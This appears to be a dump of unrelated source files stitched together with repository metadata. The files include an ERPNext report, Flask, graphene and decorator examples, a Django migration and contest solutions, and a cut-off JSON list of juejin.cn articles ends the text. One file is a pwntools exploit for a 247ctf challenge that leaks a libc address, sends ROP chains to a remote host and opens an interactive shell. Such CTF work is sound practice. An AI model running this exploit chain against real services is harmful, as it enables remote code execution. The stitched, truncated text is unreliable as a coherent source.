    """Report entry point: run the standard ERPNext Stock Balance report and
    extend it with a Supplier column and default buying/selling price columns.
    """
    from erpnext.stock.report.stock_balance.stock_balance import execute
    columns, data = execute(filters)
    # Default price list names come from the global Buying/Selling Settings.
    prices = {
        "buying": frappe.db.get_single_value("Buying Settings", "buying_price_list"),
        "selling": frappe.db.get_single_value("Selling Settings", "selling_price_list"),
    }
    return _get_columns(columns, prices), _get_data(data, prices, filters)
def _get_columns(columns, prices):
return list(
concatv(
columns[:2],
[
{
"fieldname": "supplier",
"fieldtype": "Link",
"width": 100,
"label": "Supplier",
"options": "Supplier",
}
],
columns[2:7],
[
{
"fieldname": "buying_price",
"fieldtype": "Currency",
"width": 100,
"label": prices.get("buying"),
},
{
"fieldname": "selling_price",
"fieldtype": "Currency",
"width": 100,
"label": prices.get("selling"),
},
],
columns[7:],
)
)
def _get_data(data, prices, filters):
    """Augment each stock balance row with supplier and price values, then
    optionally filter the rows by the selected supplier.
    """
    # Helper pipeline: run a SQL query parameterized with the item codes of
    # the incoming rows (row[0]) plus the price list names, key the result
    # dicts by item_code, and keep only each entry's 'value' field.
    get_query_by_item_code = compose(
        partial(valmap, lambda x: x.get("value")),
        partial(key_by, "item_code"),
        lambda x: frappe.db.sql(
            x,
            values=merge({"item_codes": mapf(lambda x: x[0], data)}, prices),
            as_dict=1,
        ),
    )
    # Price of each item on a given price list, restricted to rows whose UOM
    # is unset or matches the item's stock UOM.
    price_query = """
        SELECT
            ip.item_code AS item_code,
            ip.price_list_rate AS value
        FROM `tabItem Price` AS ip
        LEFT JOIN `tabItem` AS i ON i.name = ip.item_code
        WHERE
            ip.price_list = %({price})s AND
            ip.item_code IN %(item_codes)s AND
            IFNULL(ip.uom, '') IN ('', i.stock_uom)
    """
    suppliers_by_item_code = get_query_by_item_code(
        """
        SELECT
            parent AS item_code,
            default_supplier AS value
        FROM `tabItem Default`
        WHERE parent in %(item_codes)s
        """
    )
    buying_prices_by_item_code = get_query_by_item_code(
        price_query.format(price="buying")
    )
    selling_prices_by_item_code = get_query_by_item_code(
        price_query.format(price="selling")
    )
    def add_fields(row):
        # Splice supplier (index 2) and the two prices (after original
        # column 7) into the row, mirroring the layout in _get_columns.
        item_code = row[0]
        return list(
            concatv(
                row[:2],
                [suppliers_by_item_code.get(item_code)],
                row[2:7],
                [
                    buying_prices_by_item_code.get(item_code),
                    selling_prices_by_item_code.get(item_code),
                ],
                row[7:],
            )
        )
    def filter_by_supplier(row):
        # No supplier filter selected -> keep every row; otherwise match
        # the supplier value spliced in at index 2.
        if not filters.supplier:
            return True
        return filters.supplier == row[2]
    make_data = compose(partial(filterf, filter_by_supplier), partial(map, add_fields))
    return make_data(data)
|
[
"[email protected]"
] | |
40b52f45132e2e3030aae2cd04ce2496b8e8a52c
|
76995eda52f3d8b7310ff53fc9b5f8b9ea00287a
|
/hello world.py
|
43b4393dd19e59377c38451746abce7b31c05adc
|
[] |
no_license
|
tonybelair922/demo_YT
|
7bcf3573bb4ae2bdf34d615a5aecd40a48211faf
|
e748bd33878699f886928449b7926baa11356383
|
refs/heads/main
| 2023-03-13T09:59:14.937299 | 2021-03-08T07:44:33 | 2021-03-08T07:44:33 | 326,244,329 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,645 |
py
|
"""
msg= " Hello world"
for x in range(16):
print(msg)
"""
def my_function():
    """Print the greeting six times."""
    for _ in range(6):
        print("Hello from a function")


my_function()
# NOTE(review): this dict literal is evaluated and immediately discarded --
# it appears to be a pasted sample API response (t_2m:C temperatures and
# relative_humidity_2m:p values per coordinate/date). As written it has no
# effect; assign it to a name or remove it.
{
    "version" : "3.0",
    "user" : "internal-api-beta-user",
    "dateGenerated" : "2016-12-23T15:24:07Z",
    "status" : "OK",
    "data" : [ {
        "parameter" : "t_2m:C",
        "coordinates" : [ {
            "lat" : 50,
            "lon" : 10,
            "dates" : [ {
                "date" : "2016-12-20T00:00:00Z",
                "value" : -1.18699,
            }, {
                "date" : "2016-12-21T00:00:00Z",
                "value" : -2.58338,
            }, {
                "date" : "2016-12-22T00:00:00Z",
                "value" : 0.0499817,
            } ]
        }, {
            "lat" : 40,
            "lon" : 20,
            "dates" : [ {
                "date" : "2016-12-20T00:00:00Z",
                "value" : -0.186987,
            }, {
                "date" : "2016-12-21T00:00:00Z",
                "value" : -0.0833496,
            }, {
                "date" : "2016-12-22T00:00:00Z",
                "value" : 1.04998,
            } ]
        } ]
    }, {
        "parameter" : "relative_humidity_2m:p",
        "coordinates" : [ {
            "lat" : 50,
            "lon" : 10,
            "dates" : [ {
                "date" : "2016-12-20T00:00:00Z",
                "value" : 98.0471,
            }, {
                "date" : "2016-12-21T00:00:00Z",
                "value" : 94.6451,
            }, {
                "date" : "2016-12-22T00:00:00Z",
                "value" : 96.7655,
            } ]
        }, {
            "lat" : 40,
            "lon" : 20,
            "dates" : [ {
                "date" : "2016-12-20T00:00:00Z",
                "value" : 77.4957,
            }, {
                "date" : "2016-12-21T00:00:00Z",
                "value" : 78.3308,
            }, {
                "date" : "2016-12-22T00:00:00Z",
                "value" : 64.9726,
            } ]
        } ]
    } ]
}
|
[
"[email protected]"
] | |
cd48574c9c58a59d8434aa039fe557ccc7bf88f9
|
0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a
|
/python3/16_Web_Services/e_GraphQL/creating/a_graphene/e_input_object_types.py
|
409fed8fe1a59002922ab86d2f343886941285b2
|
[] |
no_license
|
udhayprakash/PythonMaterial
|
3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156
|
e72f44e147141ebc9bf9ec126b70a5fcdbfbd076
|
refs/heads/develop
| 2023-07-08T21:07:33.154577 | 2023-07-03T10:53:25 | 2023-07-03T10:53:25 | 73,196,374 | 8 | 5 | null | 2023-05-26T09:59:17 | 2016-11-08T14:55:51 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 677 |
py
|
import graphene
class Person(graphene.ObjectType):
    # GraphQL output type returned by the createPerson mutation.
    name = graphene.String()
    age = graphene.Int()
class PersonInput(graphene.InputObjectType):
    # GraphQL input object: the `input` argument of createPerson.
    name = graphene.String()
    age = graphene.Int()
class Mutation(graphene.ObjectType):
    # Root mutation type: exposes createPerson(input: PersonInput): Person.
    create_person = graphene.Field(Person, input=PersonInput())
    def resolve_create_person(self, info, input):
        # Echo the input fields back as a Person instance.
        return Person(name=input.name, age=input.age)
schema = graphene.Schema(mutation=Mutation)
mutation = """
mutation {
createPerson(input: { name: "John Doe", age: 30 }) {
name
age
}
}
"""
result = schema.execute(mutation)
print(result.data["createPerson"])
|
[
"[email protected]"
] | |
27a81b2c84baeca740e1eb28aeb702ae4cfe4214
|
30c8dd5f094fa486b006d5c558aba25e64486398
|
/serv4.py
|
ae07520d05c98ff50c16029501b715aca5877c55
|
[] |
no_license
|
badillosoft/iot-b
|
9942b2501ebb0457b2bd5a3c69855706bce6d486
|
4f608a2b808e4fb9476a73e513664082f34d58ce
|
refs/heads/master
| 2020-03-31T03:59:13.947614 | 2018-10-07T00:05:28 | 2018-10-07T00:05:28 | 151,886,825 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 313 |
py
|
# -*- coding: utf-8 -*-
from flask import Flask
import os
app = Flask(__name__)
@app.route("/saludar")
def saludar():
    """Simple greeting endpoint ('saludar' = greet)."""
    return "Hola"
@app.route("/ultra")
def ultra():
    """Run the ultrasonic-sensor script and return its stdout as the response.

    NOTE(review): shells out on every request. The command is fixed (no user
    input reaches it), but os.popen offers no error handling -- consider
    subprocess.run with a check on the return code.
    """
    stream = os.popen("python ultrasonico_html.py")
    return stream.read()
# Bind to this machine's hard-coded LAN address so other devices can reach it.
app.run(host="192.168.100.48")
#http://192.168.100.48:5000/saludar
|
[
"[email protected]"
] | |
5584ee69c15cd5aacd051f6f1e7bfd3f031a0c37
|
8e23cbf08a8c5d966f642ef89a25309392acdb36
|
/python教学/装饰器.py
|
e6b6e1325f7f6353583cdae58f87ff140bebf4a3
|
[] |
no_license
|
gyhd/python_study
|
ba94eca3aa391c56cdb34a48bcb6cd32581703e0
|
3b8c99179903d9c81b70d65c8df3023449394f57
|
refs/heads/master
| 2022-11-27T18:00:20.259082 | 2020-07-11T09:49:10 | 2020-07-11T09:49:10 | 248,500,662 | 3 | 1 | null | 2022-11-22T05:08:17 | 2020-03-19T12:44:35 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,499 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 29 15:48:22 2019
@author: Maibenben
"""
"""
def use_logging(func):
def wrapper(*args,**kwargs):
kwarg_values=[i for i in kwarg_values()]
for arg in list(args) + kwarg_values:
if not isinstance(arg,int):
return print('wrong input')
return func(*args,**kwargs)
return wrapper
@use_logging
def foo(a,b):
return (a+b)
foo(5,1)
"""
import hello
print('I am python')
class Foo(object):
    """Class-based decorator: wraps a function and prints before/after each call."""
    def __init__(self,func):
        self.func=func
    def __call__(self):
        # Decorated function is replaced by this instance; calling it runs
        # the wrapped function between the two prints.
        print("%s is running"%self.func)
        self.func()
        print("%s is end"%self.func)
@Foo
def bar():
    print('bar')
bar()
class people:
    """Demonstrates @property with name-mangled private attributes."""
    def __init__(self,n,a):
        self.__name=n
        self.__age=a
    @property
    def age(self):
        # BUG FIX: the original did `return print(self.__age)`, so the
        # getter always returned None (print's return value). A property
        # getter must return the value itself.
        return self.__age
    @age.setter
    def age(self,age):
        self.__age=age
    def speak(self):
        print("%s says: I am %d years old"%(self.__name,self.__age))
# Instantiate and exercise the class.
p=people('fiona',20)
p.age=50
p.speak()
class A(object):
    """Demonstrates @classmethod: func2 receives the class itself as cls."""
    bar=1
    def func1(self):
        print('foo')
    @classmethod
    def func2(cls):
        print('func2')
        print(cls.bar)
        cls().func1() # instantiate the class and call the foo method
A.func2() # no instance needed for a classmethod
class C(object):
    """Demonstrates @staticmethod: f takes neither self nor cls."""
    @staticmethod
    def f():
        print('fiona')
C.f() # a static method needs no instance
a=C()
a.f() # it can also be called via an instance
|
[
"[email protected]"
] | |
855b7ea3ed9f6b80d4674bf06c86a849cf414ce6
|
45b4687f1a9bc885666c06ea2c6b105e5058a7ae
|
/pyavrutils/examples/usage_ard.py
|
15cb144b0f5e90d4f551e9711bed305552c40885
|
[
"BSD-2-Clause"
] |
permissive
|
ponty/pyavrutils
|
5e14e0d2275235d87ed5668b632b16d0ea05711d
|
460ae240b1360241e6867684300bd5f9a23b057b
|
refs/heads/master
| 2020-12-24T16:06:55.990646 | 2020-05-02T09:00:26 | 2020-05-02T09:00:26 | 2,108,946 | 10 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 569 |
py
|
from entrypoint2 import entrypoint
# Example session to replay: each line is either an expression (eval'd and
# its result shown) or a statement (exec'd).
code = '''
from pyavrutils import Arduino
cc = Arduino(board='mini')
cc.build('void setup(){};void loop(){}')
cc.output
cc.size()
cc.size().program_bytes
cc.board='pro'
cc.build('void setup(){};void loop(){}')
cc.output
cc.size().program_bytes
cc.warnings
'''


@entrypoint
def main():
    """Replay the embedded example line by line, echoing a REPL-like session.

    eval/exec here operate only on the fixed `code` string above, never on
    external input.
    """
    for line in code.strip().splitlines():
        print('>>> %s' % line)
        try:
            # Expressions: evaluate and show any non-empty result.
            s = eval(line)
            if s:
                print(s)
        except SyntaxError:
            # Statements (imports, assignments) cannot be eval'd; exec them.
            exec(line)
|
[
"ponty@home"
] |
ponty@home
|
1024e3e86e782595371ff6d7a72d2c358bef7c38
|
8096e140f0fd38b9492e0fcf307990b1a5bfc3dd
|
/Python/madlibs/version1.py
|
030da60671377a43b1498010dbff0898eb122bb7
|
[] |
no_license
|
perennialAutodidact/PDXCodeGuild_Projects
|
0cacd44499c0bdc0c157555fe5466df6d8eb09b6
|
28a8258eba41e1fe6c135f54b230436ea7d28678
|
refs/heads/master
| 2022-11-15T22:26:45.775550 | 2020-07-07T17:13:01 | 2020-07-07T17:13:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 794 |
py
|
# Mad Libs: collect words from the user, then print the completed story.
print("\nPlease enter: \n")
adjective_1 = input("Adjective: ")
place = input("Place: ")
plural_noun = input("Plural noun: ")
adjective_2 = input("Adjective: ")
adjective_3 = input("Adjective: ")
verb_1 = input("\"ing\" verb: ")
verb_2 = input("\"ing\" verb: ")
adjective_4 = input("Adjective: ")
adjective_5 = input("Adjective: ")
noun_1 = input("Noun: ")
# BUG FIX: the original built this f-string but never printed or assigned it,
# so the completed story was silently discarded.
print(f"If you go to some {adjective_1} place like {place} , you must know how to deal with wild animals such as bears, wolves and{plural_noun} . The most important of these is the bear. There are three kinds of bear, the grizzly bear, the {adjective_2} bear and the {adjective_3} bear. Bears spend most of their time {verb_1} or {verb_2} . They look very {adjective_4} , but if you make them {adjective_5} , they might bite your {noun_1} .")
|
[
"[email protected]"
] | |
980e1ccc875d26d9d2310924a4cf756d9eb52c42
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/07-RemoteLibcId/247ctf_non-exectuable-stack/exploit.py
|
8ae0a1385c0478c8df203b33d8d459ef768279ff
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 889 |
py
|
#!/usr/bin/env python3
from pwn import *
import os
import sf
import sys
import signal
target = remote("042f9172aa4814e7.247ctf.com", 50384)
# Stage 1: 32-bit ROP chain starting 0x2c bytes into the input buffer.
# The hard-coded addresses presumably leak a libc pointer and return for a
# second input -- TODO confirm against the target binary.
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x2c)
rop_chain = [134513552, 134513981, 134520856]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
target.recvline()
target.recvline()
leak = target.recv(4)
puts_address = u32(leak) # 4-byte little-endian leak
# 422752 = offset of puts within the remote libc (per variable naming).
libc_base = puts_address - (422752)
print("libc base is: %s" % hex(libc_base))
# Stage 2: libc-relative chain using the computed base; offsets look like a
# one-gadget/system-style call with b'0000' as return-address filler --
# TODO confirm offsets against the remote libc build.
bof_payload = sf.BufferOverflow(arch = 32)
bof_payload.add_base("libc", libc_base)
bof_payload.set_input_start(0x2c)
rop_chain = [[249104, 'libc'], b'0000', [1554639, 'libc']]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
time.sleep(.5)
target.interactive()
|
[
"[email protected]"
] | |
5a9e2337774edfa2d38ae948f760275231a69469
|
41311e8bbed80e1f819157d24d7943c05ba6b2e6
|
/quiz/p1-1.py
|
6904090c9c4d88daefea5beda24e62a30c34efb8
|
[] |
no_license
|
tanglan2009/MITx6.00.2x_Introductin_Computational_Thinking_and_Data_Science
|
c0bb39cb0964014661823e1301f05af7837ff3c5
|
334726fca7f87eae55f5f45c3cdc4dbac02cfac4
|
refs/heads/master
| 2021-01-10T02:49:34.663406 | 2016-03-06T19:49:44 | 2016-03-06T19:49:44 | 53,272,724 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 136 |
py
|
import random
def f(x):
    """Return x plus a random fractional offset, truncated back to int.

    x is an integer; for non-negative x every offset in {0.25, 0.5, 0.75}
    is truncated away by int(), so the result is always x itself.
    """
    offset = random.choice([0.25, 0.5, 0.75])
    return int(x + offset)
print f(1)
print f(2)
print f(3)
|
[
"[email protected]"
] | |
c020c2f69a1976edb765483dd834de041a8b2bb9
|
3ae29d8aa791c03e9a09eb07a83a1eaf49772fb6
|
/restaurant/migrations/0019_auto__del_rating.py
|
a4af116d7a5caeba246a44a2461a5fd07f2f124c
|
[] |
no_license
|
rif/click2eat
|
26ca011288b1d4f9d69c0e8ecd36fcd622eb5d0c
|
1a6894a46e8bf49edfb9c16e50d925e6354ddc6a
|
refs/heads/master
| 2020-07-11T22:47:15.756006 | 2012-05-15T16:15:22 | 2012-05-15T16:15:22 | 204,658,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,928 |
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Forward migration: drop the table backing the removed 'Rating' model."""
        # Deleting model 'Rating'
        db.delete_table('restaurant_rating')
def backwards(self, orm):
# Adding model 'Rating'
db.create_table('restaurant_rating', (
('delivery_time', self.gf('django.db.models.fields.SmallIntegerField')()),
('feedback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('restaurant', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['restaurant.Unit'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('quality', self.gf('django.db.models.fields.SmallIntegerField')()),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('restaurant', ['Rating'])
models = {
'restaurant.communication': {
'Meta': {'object_name': 'Communication'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'restaurant.currency': {
'Meta': {'object_name': 'Currency'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'restaurant.deliverytype': {
'Meta': {'object_name': 'DeliveryType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.FloatField', [], {})
},
'restaurant.employee': {
'Meta': {'object_name': 'Employee'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
'restaurant.interval': {
'Meta': {'object_name': 'Interval'},
'end_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Schedule']"}),
'start_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'weekdays': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '13'})
},
'restaurant.partnerpackage': {
'Meta': {'object_name': 'PartnerPackage'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'restaurant.paymentmethod': {
'Meta': {'object_name': 'PaymentMethod'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'restaurant.schedule': {
'Meta': {'object_name': 'Schedule'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unit': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['restaurant.Unit']", 'unique': 'True'})
},
'restaurant.unit': {
'Meta': {'object_name': 'Unit'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'admin_users': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'communication': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.Communication']", 'symmetrical': 'False'}),
'contact_person': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'units_using_this'", 'to': "orm['restaurant.Currency']"}),
'delivery_range': ('django.db.models.fields.FloatField', [], {}),
'delivery_time': ('django.db.models.fields.IntegerField', [], {}),
'delivery_time_user': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'delivery_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.DeliveryType']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Employee']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {}),
'logo_path': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {}),
'minimum_ord_val': ('django.db.models.fields.IntegerField', [], {}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'overall_discount': ('django.db.models.fields.FloatField', [], {}),
'package': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.PartnerPackage']"}),
'payment_method': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.PaymentMethod']", 'symmetrical': 'False'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'})
}
}
complete_apps = ['restaurant']
|
[
"[email protected]"
] | |
f392ac0672bb07b6422d2d0b1428717eff6cc3b4
|
b22b0760b29d24cff24eda9d1c114094fd1a588f
|
/Python/Easy/1002. Find Common Characters.py
|
31ed0092f8a82223904bdc350b72986f3fbb5b1f
|
[] |
no_license
|
MridulGangwar/Leetcode-Solutions
|
bbbaa06058a7b3e7621fc54050e344c06a256080
|
d41b1bbd762030733fa271316f19724d43072cd7
|
refs/heads/master
| 2022-03-07T12:20:33.485573 | 2022-02-21T07:22:38 | 2022-02-21T07:22:38 | 231,700,258 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 906 |
py
|
class Solution(object):
def commonChars(self, A):
"""
:type A: List[str]
:rtype: List[str]
"""
init_d ={}
for i in A[0]:
if i not in init_d:
init_d[i]=1
else: init_d[i]+=1
for i in range(1,len(A)):
temp={}
for char in A[i]:
if char not in temp and char in init_d:
temp[char]=1
elif char in temp and char in init_d:
temp[char]+=1
for i in init_d.keys():
if i not in temp:
del init_d[i]
else:
init_d[i] = min(init_d[i],temp[i])
result=[]
for key in init_d.keys():
for i in range(init_d[key]):
result.append(key)
return result
|
[
"[email protected]"
] | |
8870f715f7c1f62386ba321b2c3fff4410c3772b
|
aac418419c2ef4d10c5c4ceb607d3d8329a5f395
|
/Accepted/Codeshef/CATSDOGS - Cats_and_Dogs.py
|
b212a7af8376b88d41f5fa6d86ecea05063d1eb3
|
[] |
no_license
|
sudhirshahu51/projects
|
bb13395227355ff84933b6d3a0f158ee42bcdceb
|
b2d8331d14d2163b20535368a60c81f6c8bc2c8f
|
refs/heads/master
| 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 529 |
py
|
# Code Chef Cats and Dogs problem
t = int(input()) # No. of test cases
while t:
cats, dogs, legs = map(int, input().split())
high = (cats + dogs) * 4 # when all the cats and dogs legs are touching ground
if (cats - (2 * dogs)) <= 0:
low = (dogs * 4) # only dogs legs are touching ground
else:
low = (cats - dogs) * 4 # cats no. are greater than twice of dogs
if legs % 4 == 0 and low <= legs <= high:
print('yes')
else:
print('no')
t -= 1
|
[
"[email protected]"
] | |
074c7250d576b20673e7c68a4de9e26a9df9037f
|
3d7039903da398ae128e43c7d8c9662fda77fbdf
|
/database/CSS/juejin_1312.py
|
2d36b3449d0f0513687328d1a4612401e5b4a267
|
[] |
no_license
|
ChenYongChang1/spider_study
|
a9aa22e6ed986193bf546bb567712876c7be5e15
|
fe5fbc1a5562ff19c70351303997d3df3af690db
|
refs/heads/master
| 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 70,289 |
py
|
{"err_no": 0, "err_msg": "success", "data": [{"article_id": "6844904202922098701", "article_info": {"article_id": "6844904202922098701", "user_id": "1855631356860685", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/6/30/173049ee163d1e93~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "css3 javascript 单行和多行文本溢出截断多种方案", "brief_content": "在我们日常开发中的时候经常会遇到一种业务场景,需要截断一些文字的显示。可能是一行或者两行,或者根据字数限制或者用户的显示屏幕大小来展示对应的文字。 响应式截断,当文本溢出的时候才显示省略号。 用伪元素模拟省略号,兼容性较好,但是展示有部分问题,可能需要结合部分 javascri…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1593510303", "mtime": "1611443179", "rtime": "1593513254", "draft_id": "6845076843935055885", "view_count": 1837, "collect_count": 21, "digg_count": 6, "comment_count": 1, "hot_index": 98, "is_hot": 0, "rank_index": 0.00057287, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1855631356860685", "user_name": "西南_张家辉", "company": "才华有限分公司", "job_title": "切图仔", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/a9729684b3af2c2014a6c34ecaeb2a57~300x300.image", "level": 3, "description": "感谢你这么有才华还关注我", "followee_count": 41, "follower_count": 1413, "post_article_count": 105, "digg_article_count": 207, "got_digg_count": 2478, "got_view_count": 249881, "post_shortmsg_count": 41, "digg_shortmsg_count": 206, "isfollowed": false, "favorable_author": 0, "power": 4980, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": 
"前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844904202922098701, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903603136806919", "article_info": {"article_id": "6844903603136806919", "user_id": "1081575169076430", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640394175971342], "visible_level": 0, "link_url": "https://www.w3ctrain.com/2017/07/01/effective-work/", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/5/8/1633d680ac546f7c~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "提高你的开发效率啊,切图仔", "brief_content": "工作到今天正好一年,待过两家公司,做过面向用户的前端,也做过管理系统的前端,现在主要的还是移动端的活动页。每天都在写业务相关的代码,怕久而久之…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1525743619", "mtime": "1599468938", "rtime": "1525743619", "draft_id": "0", "view_count": 5288, "collect_count": 31, "digg_count": 88, "comment_count": 17, "hot_index": 369, "is_hot": 0, "rank_index": 0.00057224, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1081575169076430", "user_name": 
"FESKY", "company": "Tencent", "job_title": "前端开发工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/53de59875129f0f646158701c548a926~300x300.image", "level": 4, "description": "相信坚持的力量。", "followee_count": 27, "follower_count": 3546, "post_article_count": 65, "digg_article_count": 106, "got_digg_count": 7728, "got_view_count": 218021, "post_shortmsg_count": 0, "digg_shortmsg_count": 14, "isfollowed": false, "favorable_author": 1, "power": 9825, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": 